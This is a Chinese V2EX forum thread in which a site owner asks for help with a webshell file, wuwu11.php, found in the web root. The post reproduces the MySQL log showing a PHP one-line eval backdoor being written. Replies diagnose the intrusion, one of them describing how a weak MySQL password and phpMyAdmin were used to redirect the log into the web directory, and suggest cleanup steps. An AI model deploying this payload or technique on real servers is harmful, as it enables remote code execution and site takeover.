V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
fzxml
V2EX  ›  PHP

求助各位 v 友,网站根目录多了一个 wuwu11. PHP 的文件

  •  1
     
  •   fzxml · 2018-03-31 08:56:34 +08:00 · 5834 次点击
    这是一个创建于 2454 天前的主题,其中的信息可能已经有所发展或是发生改变。

    阿里云云盾检测到发现后门 webshell 根目录多了一个 wuwu11.php 的文件, 内容是:

    D:\web\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
    TCP Port: 3306, Named Pipe: MySQL
    Time                 Id Command    Argument
    		65264 Init DB	mysql
    		65264 Query	SHOW TABLES FROM `mysql`
    		65264 Query	SHOW TABLE STATUS FROM `mysql`
    		65264 Query	SELECT CURRENT_USER()
    		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
    		65264 Query	SELECT CURRENT_USER()
    		65264 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
    		65264 Quit	
    180330 19:55:36	65265 Connect	root@localhost on 
    		65265 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
    		65265 Init DB	mysql
    		65265 Init DB	mysql
    		65265 Query	select '<?php @eval($_POST[h])?>'
    		65265 Init DB	mysql
    		65265 Query	SHOW TABLES FROM `mysql`
    		65265 Query	SHOW TABLE STATUS FROM `mysql`
    		65265 Query	SELECT CURRENT_USER()
    		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='EVENT'
    		65265 Query	SELECT CURRENT_USER()
    		65265 Query	SELECT `PRIVILEGE_TYPE` FROM `INFORMATION_SCHEMA`.`USER_PRIVILEGES` WHERE GRANTEE='''root''@''127.0.0.1''' AND PRIVILEGE_TYPE='TRIGGER'
    		65265 Query	SHOW TABLES
    		65265 Quit	
    180330 19:55:37	65266 Connect	root@localhost on 
    		65266 Query	SET NAMES 'utf8' COLLATE 'utf8_general_ci'
    		65266 Init DB	mysql
    		65266 Init DB	mysql
    		65266 Query	set global general_log = 'Off'
    
    15 条回复    2018-08-20 15:51:16 +08:00
    111111111111
        1
    111111111111  
       2018-03-31 09:17:27 +08:00 via Android
    注入漏洞吧,服务器权限也没设置
    cyn
        2
    cyn  
       2018-03-31 09:21:06 +08:00 via Android
    只会执行<?php @eval($_POST[h])?> 吗?
    wukaichao
        3
    wukaichao  
       2018-03-31 09:25:17 +08:00 via iPhone
    注入吧,直接在读表了。
    kuzhan
        4
    kuzhan  
       2018-03-31 09:26:33 +08:00 via Android
    都脱裤了 还问
    zjsxwc
        5
    zjsxwc  
       2018-03-31 09:29:20 +08:00
    honkew
        6
    honkew  
       2018-03-31 09:53:16 +08:00
    @zjsxwc 竟然发出来了,我用 Cknife 连了一下 可以连上
    Les1ie
        7
    Les1ie  
       2018-03-31 12:42:37 +08:00
    @honkew V2EX 上发自己服务器的一句话木马 翻车现场
    janus77
        8
    janus77  
       2018-03-31 12:46:36 +08:00 via Android
    哈哈哈哈哈
    sinver
        9
    sinver  
       2018-03-31 12:52:07 +08:00
    phpmyadmin 及各种弱口令.....感觉重装系统 及重新搭建网站和权限控制吧....
    fange01
        10
    fange01  
       2018-03-31 13:00:34 +08:00
    @Les1ie 翻车现场,竟然还不处理。
    @honkew 哈哈哈哈
    lifeintools
        11
    lifeintools  
       2018-03-31 14:05:00 +08:00
    还有网站源码。。你还不设置权限。。。。。
    xuyl
        12
    xuyl  
       2018-03-31 20:24:01 +08:00
    php 码农安全意识堪忧啊。
    Tink
        13
    Tink  
       2018-03-31 23:22:25 +08:00 via iPhone
    fanglongzong
        14
    fanglongzong  
       2018-04-06 10:16:42 +08:00
    跟楼主一模一样的情况。

    完全是技术小白,不知道要怎么办……
    maoxs2
        15
    maoxs2  
       2018-08-20 15:51:16 +08:00
    1. 不是我搞得,只是碰巧碰见了这个后门好几回
    2. 攻击点是 MySQL 弱密码+phpMyAdmin
    3. 注入点是日志文档保存路径修改至 apache 服务器解析文件夹(通过 phpinfo 获得 /phpstudy 等框架猜解)
    4. 解决方法删除它后续步骤放的别的后门程序( exe+服务),删除 wuwu11,修改 MySQL 弱密码,删掉 phpMyAdmin 或者修改路径或者加 http 认证啥的
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1263 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 23:34 · PVG 07:34 · LAX 15:34 · JFK 18:34
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.